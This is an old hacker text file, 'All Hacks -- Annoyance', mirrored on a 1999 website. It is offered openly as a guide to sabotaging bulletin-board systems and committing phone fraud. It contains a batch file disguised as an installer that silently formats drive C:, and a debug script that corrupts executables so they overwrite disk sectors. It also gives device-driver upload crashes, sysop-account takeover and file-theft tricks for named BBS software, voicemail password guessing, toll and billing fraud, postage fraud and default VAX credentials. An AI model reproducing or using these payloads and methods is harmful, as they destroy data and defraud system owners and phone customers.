All hacks / Annoyance @ Matarese.com
Click here to find books related to 'hackers'.
* * * All Hacks -- Annoyance * * *
Aha was founded by Firewalker. Firewalker is in NO WAY held
liable for these hacks/flaws/phreaks/access codes.
This file could contain, wrong information, or, worse, mistakes!
I am in no way (the editor) saying that all of these work.
Aha was started because there wasn't anything better to do,
Firewalker can be found on most pirate boards, and a few of
the public access ones too. Contact him, internet, at:
firstname.lastname@example.org or, contact his bulletin board
at -- (303) 747-2088.
Lets get started
If we must! Geesh..
One known bbs hack, to pretty much everyone in the United States,
is the device driver uploads. --- Some could be asking right now
"whats a device driver?" Well, for those of you that are asking:
Don't you know anything?! A device driver is a form of TSR, that
requires alot more than just a memory area. Such as QEMM386.SYS
CON, COM1¨, COM2¨, LPT1˙, LPT2˙, CLOCK$, and others...To get
your device driver listing, using MS-DOS 3.xx and up, type: MEM /D
which shows memory in debug format (don't worry, its easy to
understand after a few times of doing it)
The Uploading of device drivers has been known to most hackers
for along time, ever since WWIV 1.0 came out (long time ago!)
This only works on some boards however, and I have only tested
it on these software packages:
o Telegard (all versions)
o WWIV (till version 4.20)
o PC Board version 14
o Ultra (some, but not all versions)
So..you ask, what good is this stuff? Well, its very interesting,
if you take down someone you really don't likes board, just by up-
loading a file? Try it on some local boards!
o Alot of the sysop logs show you loging on, and uploading that
file(s) -- Use a false account.
o If sysop is running a mailer, such as FrontDoor, or Binkly,
Your out of luck, their system will just rest
o If sysop has his loading batch file rest the board, you lost.
o If sysop is running Watch Dog, Watch Cat, Watch Com, or Watch
Man, his system will be reset.
¨ | Some text files are not true, saying that COM 1-6 works, the
comports that will work are 1-2, none others.
˙ | Some text files are not true, saying that LPT 1-4 works, the
printerports that work are 1-2 only!
The Clock$ Hoax:
Some systems have protected agenst uploads of CLOCK$ or COMX, or
whatever you desire, well, I still like to upload files like that.
This takes alittle more time, but still is alot of fun:
take a simple textfile, and zip it, but make sure the zip is no
bigger than 6k! The filename, (Please only one at a time) must be
6 chars, then...Use debug, diskedit, hex2edit, or whatever you use
to decode .EXE or .COM files, in the zip file, you will see your file
name as one of the first things, simply change the file name to
clock$.$$$, and as soon as the poor, unexpecting sysop unzips it
it sends that text file to his CMOS, instantly reblowing someones
system, pain in the butt to fix. But, if the sysop is smart enough
(I haven't met many that are) they will know how to fix CMOS.
Reupload the file, but this time, make sure its out, have him on
vacation, and upload this file, with a different name, but, use
V-iew an archive (Telegard, WWIV, ULTRA, PC-BOARD), and view your
poor unexpecting file, and he just lost his CMOS again, but if
he is on that 6 week vacation, then, his board just lost alot of
--This also works for the NEW version of WWIV--4.20 and 4.21a!
--Sysops- To protect from CLOCK$ and all other device drivers,
have a batch file, to start up your board,
and make all uploads go to a Sysop Directory, so that people can't
turn around and view those stupid files.
That doesn't work!
If that doesn't get a sysop mad, try something like this,
creat a file, usally LOGOFF.BAT (WWIV, TELEGARD) and have it move
itself to the main bbs directory, have it be a RUNME.BAT file for
the sysop to run even, In this file, have these commands:
echo Installing. . . Wait.
rem Don't make it look like a hoax!
echo Y | FORMAT C: > nul
rem which means, format, but answer the question yes! with no echo
Look nice and mean? This really works. Remember, this is for
hacking purposes only. (grin)
get a program that disallows a format of C:, like Robert March's
Whatta mean that last thing doesn't work? Thats 'per childs play. How
about this type of file:
Make a batch file (sorry, this is hard)
use this text:
----> Cut Line <----
echo e cs:0100 b4 19 cd 21 b9 09 00 33 d2 cd 26 > ~~temp.~tp
echo w >> ~~temp.~tp
echo q >> ~~temp.~tp
debug %1 < ~~temp.~tp > nul
erase ~~temp.~tp > nul
----> Cut Line <----
(Note, this isn't nice)
Then run this file on a .COM or .EXE file you may have, COMMAND.COM is the
funnest (Make sure you got a System Disk handy!)
The Beeping Message
Most BBS software support, either an OFFLINE READER, or uploading of
messages, such as RA, and if, they allow anything besides Ascii
protocol, then you got it made, you then upload a file with 200 (or
whatever the limit is, with Remote Access its unlimited, right?)
lines of BEEPS!!!! Using the ^G in Copy con, or ALT-7 in a full screen
editor. Heres a pascal program that will do it for you, so you don't
have to spend the time working on it.
Uses Crt, DOS;
fname : text;
writeln ('Running. . .');
fname := 'beeper.msg';
write (fname, chr(7));
Then upload beeper.msg, and watch the fun begin, as 200 lines of beeps
are being used each time a user reads that stupid message!!!
WWIV (Under 4.20)
WWIV is one of the easyest boards in the world to hack now,
here are a few known hacks, with some help from me, you could
be trashing someones system in less than an hour.
Uploading of CLOCK$, COM1, COM2, LPT1, LPT2, or, CON.
Uploading of a mislead file, such as HACKED.TXT zipped in a file called
work.zip, using DEBUG to modify WORK.ZIP and change the filename:
Hacked.txt to ClOcK$.$$$ or ClOcK$.TxT (case doesn't matter, just make
it look like a real hack)
Uploading a file, then redownloading it, (Note, this is only available
if its a device driver (maximum ouch!))
Uploading a message with 100 lines of beeps. (thats an ouch!)
If, Somehow, you had ELSEWERE installed on a remote system (major hack!)
you could then control their keyboard (such as, F9, temp sysop!)
ELSEWERE is on many boards, get it, you'll love it!
Having an unexpecting person (such as a father, mother, sister, brother)
typing F9 for you on that end (Ok, so thats not a hack, but once you
got sysop access you can party!)
If you know the Sysops personal password, then logon using this:
PASSWORD: RANDOM (Sysops Password)
PHONE NUMBER: ###-###-0000 (The phone is usally the sysops home number)
SY: (HANG UP HERE, THIS WILL CRASH THE BOARD!!!)
Thats all for WWIV, unless I get some mail asking for some more.
Remote Access (Version 1.10, 1.11, 1.11+)
Remote Access is alittle harder than WWIV to hack, I would tell most WWIV
sysops to either use Remote Access (RA) or Telegard, not as easy to hack
and alot better on both the sysop and the users end. Back to the hacks!
When using R.A. Version 1.10, it is really tempting to type ALT-200 (╚)
and get sysop access! Yes folks! Thats it! If you find a RA 1.10 board
you logon, and type ALT-200! You then have sysop access!
But..Its even more temping if you enter these commands in a message
Then save it. The message section could be distroyed!
This goes for all versions of Remote Access (as far as I know)
The Beeps are another fun trick, uploading a message full of beeps
(try the sysop, see how quick his CTL-ALT-DEL fingers are.)
Remote Access lets you have 300 lines, thats alot of beeps!
Or, even better, the Remote Access off line message reader, Blue Wave!
upload them that way, Its alot funner.
Telegard isn't hard to hack. If you find a Telegard 2.5 bulletin
board, I want the number, mail it to me via internet:
If, you logon as a new user, but with the sysops name/alias+
anumber on as the alias (I.E. Firewalker1) then you will have
a sysop account, without the sysop even knowing, read the private
E-Mail, and even drop to Mini Dos! Some of the joys of knowing about
Telegard 2.5 system is seeing how quick a sysop can catch on!
There are others, such as the Archive Menu, Telegard 2.5 never
hid the archive menu, which means, you could do a "/D" (download)
of this file: ..\..\STATUS.DAT, and get all the pathnames, as well
as the System Password, which would allow you to, if, 1, you had
the sysops personal password, logon as him, and trash his system.
2, Lock out a few people you don't like! Once you have the path
names (can be viewed just by typing them, they would look like:
etc..etc.. You can download the USER LIST. The most
important file using telegard, by downloading, this time:
Now, some sysops know about this, and will try to fool you,
by switching the General Files (G-Files) with the All Files (A-files)
section. You then, just download with a different pathname.
Or, heck, make an off line archive using the archive menu,
and have it include those files, sometimes, if the sysop is dumb
enough (I have seen many) they will allow pathnames in archives, so
you can get those two important files any day of the year you want
and keep loging in as the sysop, and doing this:
* (from the main menu, usally takes you to the Sysop Menu)
P (from the Sysop menu, takes you to the System Config)
System Password: (enter the system password here)
A. Modem configuration
B. File paths & BBS configuration
C. System ACS settings
D. System variables
E. System flagged functions
F. File system configuration
G. New user and auto-validation settings
H. Miscellaneous configuration
I. Network configuration
J. String configuration
K. Default colors
1. Time limitations
2. Call allowance/day
3. UL/DL # files ratio
4. UL/DL K-bytes ratio
5. Post/call ratio
Then type C, then change the security levels accordingly.
The Message Beeps, Don't forget those!
If you have a Co-Sysop account on a telegard board (2.4, 2.5, 2.7)
you can upload the Status.dat, using this command:
(write a message, say to a buddy of yours)
Whopps.. You now have the status.dat file.. scary for a sysop.
Flaws in other Files:
I have seen some so called "Hacking files" in the past, that are like
this one. But never showing you the hacks, they just tell you that
there are hacks, well, I already knew that much. I wanted to thank
Tot, for helping me out with the Remote Access hacks. There are a
few I haven't told in this file, I might in the next, if I get a cry
for another update, or whatever. I have seen, Hackers Unlimited Mag.
By Mickey Mouse Club (MMC) This file IS a flaw, according to this
so called file, TeleConferencing is not charged to a phone bill, and
maybe used to dial people in far away places and talk to them all at
once. Well....Dark Lord...And who ever helped out with that:
0-700-456-1000 (Teleconferencing, without the operator) does not work!
I have a $1,700 phone bill that maybe you would like to take care of?
Warning, don't believe anybody that says, You can call long distance
for free using this number... Duh... No. You can't. The Phone Company
is alot smarter and would not allow such stuff! Now, there is one
true thing in the Hackers Unlimited Mag, that is about 950.1001 numbers
They are valid, but once you find an access code, they are charged to
the company, or even maybe the phone company, if you get the right access
codes. with 950-1001, its a 6 digit access code you are looking for.
Play around with it, But, besure you don't rack someones phone bill up
to $2,000! (Who knows, it could be MY access code your using.)
Here is the format for 950-1001 numbers: Dial in, when you hear a dialtone
enter: 0000003037472088 -- This would call, my bulletin board.
^^^^^ Put an access code here
Or, for using this with Modems, enter:
Access Pause accesscode+area code+phone number
Thats about it on Access codes. But, say you can't sleep at 2 am. And
all the boards are busy, because no one else can sleep either, why
not call and talk with an operator? Yes..Operators like to be talked
to too. But..Why call and talk to just any ole operator voice?
How about dialing up the Colorado Relay (if you live in Colorado)?
(I will list the numbers here in a second) Once in, its fairly easy
to use, The operator will say something like, Colorado Relay service:
This is agent xxx speaking, GA (GA = Go Ahead) You just say something
like: hello agent xxx! This is How are you feeling
today? I wasn't able to sleep, and all my family is asleep, want to
talk? GA (do this when your done talking)
If he says no, then hang up, and try again, you will get a different
agent everytime! (There are over 999 agents!) Oh.. For those of you
who don't know what a "Relay" is, its a device for the deaf to call
and then an operator will answer (this is done by computer of corse)
and, you/the hearing impared person would beable to call and talk to
his/her family via, operator. You would type what you want to say, and
the operator would speak it (or, sometimes, the computer talks as you
type it out) And then whatever the remote person says the operator types
(or the computer can translate it to your screen). Have some fun with
this! You could call up a buddy, and talk, say in code, so the operators
don't know what your saying, sometimes, you can say, Oh...Just a moment
I will plug in my TDD, and then turn on your modem, and you can type back
and forth, although this does not charge, unless you dial longdistance
(heaven forbid!) please don't abuse it, people have put time and money
for the hearing impared, and you should not take that for granted.
Enough said, heres the number:
1-800-659-2656 (Colorado Relay)
1-800-659-2656 (Wyoming, Texas, and Missouri Relay)
If you are not in those above states, call your directory assistance
(1-800-555-1212) for the Relay system. All states have
them. And they are NEVER busy. So give it a shot! While your asking
for the number, ask them if they know if a modem will connect, to
be sure, unless you don't feel right about that, try it yourself.
You will hear a 300 baud type beep, for only 20 or so seconds, then
you will connect 2400/1200/300. Have fun.
VMB (Voice Mail Box)
Probably one of the SAFEST telephone usage anywhere!
Voice mailbox numbers are posted every where! You can even find some
writen on bulletin boards for validation. (The bigger ones)
How would you like your own voice mail box? Its pretty easy to
get, just call up an operator, ask how to get a Voice Mail Box...
Just kidding. If you have a valid voice mail box number (alot of
hackers will post a vmb number, and the password on the pirate
boards, sometimes it will be HIS!), once the person starts talking
push the pound sign (#) and then it should say, Enter Your Box Number:
You enter the number given to you, or we'll say 333. 333...enter your
password...hmm..this is tricky. Some passwords are:
Box number: 333
Box # + 1 : 334
Box # - 1 : 332
Box # + 0 : 0333
Box # x 2 : 666
Once you entered the correct password, they will give you choices:
Press 1 if you want to read your mail
Press 2 if you want to make a box under yours
Press 3 if you want to change your password
Press 4 if you want to record a new message
Press 0 if you want to speak with the operator
Then choose 2: You will then be given a box, up to five can be put on
each, which means, you make yourself a box, and can have 5 people
under you. Its a never ending loop! Make your password default,
your box number, so that other hackers can use the same method.
(lets be nice to our fellow hackers, if it wernt for me, would you have
VMB's can be used for alot of things, you can use them for sysops
to validate you for FREE if you call long distance! (Usally they
are 1-800 numbers!) You can sell them to other hackers! (Make some
money with this hacking bit!)
There are many many more uses for VMBs, you could talk across them
Call Back Verifyers:
Don't you hate those things? And worse...The sysop never gives you access
unless you run that? What if it doesn't verify long distance and you
are calling long distance? Wanna get back at those stupid Sysops?
For your phone number, in the call back verifyer, enter this number:
102-880-,,,, (Which is At&T Long distance service! They get charged!)
103-333-,,,, (Sprints version of it.)
Thats only one way to make a sysop mad... There are more, like making
the Call Back verifyer dial a 900 number! or a 960 number! Ever think
about it? as your number you have 900-537-2323, and they get charged a
nine hundred call when they dial it. Whopps.. Sorry there old buddy.
You shouldn't have locked me out? Hahahahaha.
3rd Party Calling
Perhaps one of the funnest things in the telephone world!
Call up your friends..Charge it 3rd party from a credit card phone
(Most are in the airports, they allow you to do that without a yes
or no answer!!!) But...Don't put it on someone elses bill! Put it
on yours! Then when you get your phone bill (panic city right?) Call
up AT&T or your long distance carrier, and tell them you didn't make
those calls. They will be removed from your phone bill (do this with
caution, some phone companys might NOT remove them!) and you got a
free long distance call...Third party style!
U.S. Postal Service
Still as fun as it always was! Say...You want to write a letter
to someone. But...Man. You just ran out of stamps, and spent your
last 5 bucks on gas..bummer. Oh-well.. How about making the return
address to the person your sending it to. And your address to make
it look like your sending it to someone, but its really yourself.
Here, easyer Shown that done.
| Jane Doe |
| 555 Chesnut St. <-- My girlfriend '-----' |
| Washington, New York My address :No : |
| 31456 | :Stamp: |
| v ,-----, |
| John Doe |
| 555 Chesnut St. |
| Washington, New York |
| 31456 |
Insted of me putting MY address in the corner, I switch the two,
so, without a stamp, the post office sends it back, but...little
do they know. They are really sending it to where it has to go!
Unix, and Vax type systems
VAX: The VAX acronym is derived from Virtual Address eXtension.
The VAX computer is designed to use memory addresses beyond
the hardware's actual limits, enabling it to handle pro-
grams that are too large to fit into physical memory. The
VAX computer system is a member of the Digital Equipment
Corporation (DEC) computer family. Currently the VAX
series includes models spanning the desktop VAX station to
mainframe class multi-CPU VAX processors. These vary from
the superminis, like MicroVAX, to the older, moderate sized
11/7XX series, to the newer 6000 series. These computer
systems commonly use an operating system known as VMS.
VMS: The VMS acronym is for Virtual Memory System. The operands
of VMS are very similar to other operating systems. Back
in the days of stand-alone computer systems, DEC had the
idea for streamlining the operation of their computers for
business and engineering. It conceived VMS as a way of
allowing the basic computer management to be done by a user
familiar with any of the multiple systems it made.
DCL: The DCL acronym is for Digital Command Language. It is the
fundamental language of the VMS. Those of you who have an
IBM system, you can think of a DCL program like a batch
file. You can do a lot with it (much more than a PC-DOS or
MS-DOS batch) but it work basically the same way. One
difference is that when you want to execute anything as if
you were typing it in at the command prompt, you first must
put a "$" in front of the command in the DCL program. DCL
programs are commonly called COM files as well. When you
are not executing a COM or DCL program file, you are almost
always typing things into the DCL processor.
WHAT DOES A VAX LOOK LIKE: (quickly)
When you log into a VAX, you will see something similar to the
AT&T MICROVAX II SYSTEM
Username: (username here)
Password: (password here... does not echo)
$ (<-- this is your prompt)
You will know if you have a VAX type system if you get the
"Username:" and "Password:" prompts. Anything is just extra that
helps you guess passwords.
GETTING IN A VAX BY ERROR:
I will only tell you one thing here. VMS 4.X and especially
VMS4.4 are goldmines. I am not going to go into this at all,
because it is a lengthy explanation that doesn't fit in the scope
of this message. You can find this discussion on ARPANET and
USENET. You can also get this information on CompuServe
Information Service, BYTE Information Exchange, and Digital
Electronics Corporation's VAX BBS. There is also a big problem
with VMS 5.1, but that doesn't involve getting in. If there are
enough requests, I will cover this information in another mes-
GETTING IN A VAX BY DEFAULT:
There are several default accounts that were put in by DEC
when testing and installing the VAX. These accounts have pass-
words which don't change from system to system. The SYSOP should
have removed these accounts or changed the passwords, but it is
not done a lot of times. Below, I have listed several defaults:
* SYSTEST UETP
* FIELD FIELD
* SUPPORT SUPPORT
Where I have listed several passwords, I have found the re-
spective usernames passworded that way as much as the default
password. The accounts with asterisks beside them are powerful
accounts by default.
VAX VMS COMMANDS:
Once you get your "$" prompt, you will be able to type in
hundreds of commands of course. I will go over a few basic ones
@ - Execute procedure. When you want to run any
DCL batch or *.COM;* file, you must include
this "@" before the filename.
ACCOUNTING - This will run the accounting program. If you
log out of a system and you see charges put
on your account for the amount of time you
are on, the system is using account. Actual-
ly every system uses accounting somewhat, but
it can be made virtually invisible. If you
are desperate, or you are having troubles
with the system operators of the VAX (SYSOPS
from now on), you can use this program to
CREATE - This will create just about anything. If you
have a program that you have written on your
PC's Pascal interpreter, you can Ascii upload
the file to the VAX using the CREATE command.
EX: CREATE program.pas;1
CREATE/DIR - This will simply create a SUB directory for
you. I will explain how to get around a VAX
in a minute. See the SET command.
EX: CREATE/DIR NameOfDir
DELETE - Just used to delete a file or EMPTY, UNPRO-
TECTED DIRECTORY. To delete a file, just
type "DEL filename.ext;x." To delete a sub
directory, first delete all of the files in
the directory: "DEL/LOG *.*;*" Next, you
will need to SET PROTECTION: "SET
PROTECTION=OWNER:D dirname.DIR" Next, delete
the directory: "DEL dirname.DIR"
EX: DEL DAVID.TXT;4
DIRECTORY - This will show you what files are contained
in the current directory. Adding "/BRIEF"
will give you a short listing and adding
"/FULL" will give you a full listing includ-
ing security information on each file. You
can shorten the command to DIR and you may
use wildcards. The "*" means anything of any
length. The "%" means anything one character
EX: DIR/FULL DAVID-%%.*;%
EDIT - This command will bring up the editor. Some
VAX systems use a type of editor similar to
MS-DOS/PC-DOS's EDLIN. HOWEVER, some VAX
systems use EDT/EVE editing which is a full
screen editor (usually). With this editor,
you can do a lot quickly, but only if your
terminal will support cursor control. VT-100
is very clumsy. Try getting VT-220 when you
use the EDT/EVE editor.
HELP - This command will bring up the HELP program.
This is just a clumsy imitation of what you
are reading. (heh heh)
LIBRARY - Used for archive purposes. You will proba-
bly not use this command much if you are new.
I am mentioning it now because I will type up
a more in depth discussion of VAX later on
the "What's Hacking?" sub boards.
LOGOUT - Logs you out.
MAIL - Loads the mail program. Used to send mail to
others users and CAN (YES, IT CAN) be used to
send mail (or other) to (OR FROM) the network
if the VAX is connected to a network. It CAN
(YES, CAN) also send data to (OR FROM) the
computers on the DECNET (if used).
$PASSWORD - Changes your password.
EX: $PASSWORD mynewpass
PHONE - Used to talk to another user. This command
is pretty nice compared to other means. Your
"$" prompt will be replaced with a "%" prompt
once phone is executed. If you want to talk
to someone, type his username. If you want
to talk to someone on a different node, type
his nodename, two colons, and then his user-
name. A lot of times you will find this one
disabled (especially on University
computers), but there are alternate ways to
communication online other than MAIL and
PHONE. See below.
PHOTO - Records session.
RUN - Executes executables. (simple?)
SET - Wow... this is a lot. See below.
SHOW - This involves a lot too, but not as much as
SET. With SHOW, you can look at a lot. I am
just going to list a lot of things you can
view and what it will show you.
EX: SHOW USERS DAV
CLUSTER - VAX cluster if any
DEFAULT - Directory path and device
DEVICES - The system devices (drives,
INTRUSION - If any accounts are being
MEMORY - Memory of course
NETWORK - Network and the VAX's location
PROCESS - PROCESS ProcessName shows
PROTECTION - Protection on files
QUOTA - Shows disk space allowed for
SYSTEM - Miscellaneous system info
DAY - Day & date
TIME - Time
USERS - Users online all systems
TYPE - Shows the contents of a file by sending it to
EX: TYPE DAVID.TXT;3
THE SET COMMAND:
The SET command is one of the most widely used and versatile
commands on the VMS 5 series DCL.
I suppose the most frequent use of SET involved the PROTECTION
option. These protections, known as SOGW or UIC protections, can
be put on any file or directory that you have WRITE & EXECUTE
privileges on. Setting the protection involves allowing differ-
ent users on the VAX to read, write, execute, or delete your file
or directory. The FILE /PROTECTION option of SET is used to
accomplish this. An example is:
SET FILE/PROTECTION=OWNER:E david.exe;4
If you typed this command in the DCL for a program called
DAVID.EXE;4 (4 is the version number), then the owner (or crea-
tor) of the file can do nothing to the file but execute it.
However, in another example:
SET FILE/PROTECTION=OWNER:RWED david.exe;4
you are going to be able to "R"ead, "W"rite, "E"xecute, and
"D"elete the program. The same applies to a directory. Just
substitute the directory name for the filename above. When
creating a directory, the SET is set so that you may not delete
it. As discussed previously, you will have to issue a "SET
PROTECTION OWNER:D dirname.dir;1" and "DEL dirname.dir;1" to
delete the directory.
Other than the owner, UIC file protection can be placed on any
of the following:
WORLD - Any user on the system.
GROUP - Any user in your group.
OWNER - Only your account or matching UIC.
SYSTEM - Anyone that has SYSPRV privileges c:\dtdosbbs
MCI is the Queen Mother of the long distance companys. There are
only a handful of companys that are "networked". This means
they've built their system to a point where travelers (or phreaks
can call into a local phone number and be in the "network" even
if they're three thousand miles from home. The exception is when
you're in an area that isn't serviced. Most LD services utilize
800 numbers so that you can connect even if you're out in the
Here we have two different code formats, one for the so called
"executive" user, primarily business, the other for the average
person. Executive class entails using the 950-1022 dialup. To
make a call you need to enter no less #than thirty two digits. You
dial zero plus the area code and phone number that you want, then
the area code and phone number with a four digit "security code"
at the end. It'll look like this, 9501022 (the dialup)
02125551212 (zero plus the area code and phone number ) then
7045551212xxxx (your area code,p#hone number and security code).
Many years ago I saw a piece of graffiti on the bathroom wall of
the Cotton Bowl. It went like this, "I've craped in England - I've
craped in France - But before I crap here again - I'll crap in my
pants." I feel the same way about this format. As a businessman,
I wouldn't waste my time trying to dial all this garbage. A real
pain in the butt. Hackers, don't find the format that tough. With
the exception of the user's telephone number and code the rest
are known quantities. You're left with fourteen numbers to hack
out. This can be reduced even further. MCI's 950 codes are good
anywhere in the country. Experienced phreaks pick an area that is
known to have an extremely high population density. New York City
is a case in points, area code 212. The number of digits has just
been reduced to eleven. The phreak will choose a prefix that is
occupied #predominantly by business and cut the number down to
eight digits, which is one less than Sprint's code. I've seen
732,306,938,255,925,678,and 564 posted on hacker boards. It seems
that Wall Street is a juicy target. The interesting thing about
hacking MCI's 950 numbers is that the phreak also gets the number
of the person who's going to be getting the bill. It's not
unusual for the hacker to call the victim on some pretense just
to find out who it is. If it's a large company who might not
notice a few additional phone calls, he'll use the code sparingly
so as not to attract attention. The end result will be years of
free long distance.
Some psychologists say that names can affect the development of a
child. I knew two kids when I was in school who's names are
etched in my memory forever, Jock Strap and Harry Balls. Their
parents should have been shot. The president of MCI is Orville
Wright. Orville has his work cut out for him.
-- For now..This is Firewalker..saying happy
--I'll be back!
All Hacks Annoyance Staff:
Editor - Midnight Walker - BBS Line - 772-8549 aka Slider
Writer - Firewalker - BBS Line - 747-2088
-: ThE pArK BBS :-
--! Specialising on Anarchy textphiles, phone phun and odd ideas... !--
Running Reccoon!300-16.8DST speed!+46 (0)570-770033!LoadsOfPyro/Phreak/
->Unique drugarea!<- ->Supporting HSI-Net<-
This page was created Wed Aug 11 02:03:18 EDT 1999
on an i586
Main Page @ Matarese.com
Acquiring Account Information @ Matarese.com
Symantec Act! 2 for Windows @ Matarese.com
All hacks / Annoyance @ Matarese.com
The Matarese Circle @ Matarese.com
QueSO Test Drive @ Matarese.com
Copyright (C) 1999 - Matarese.com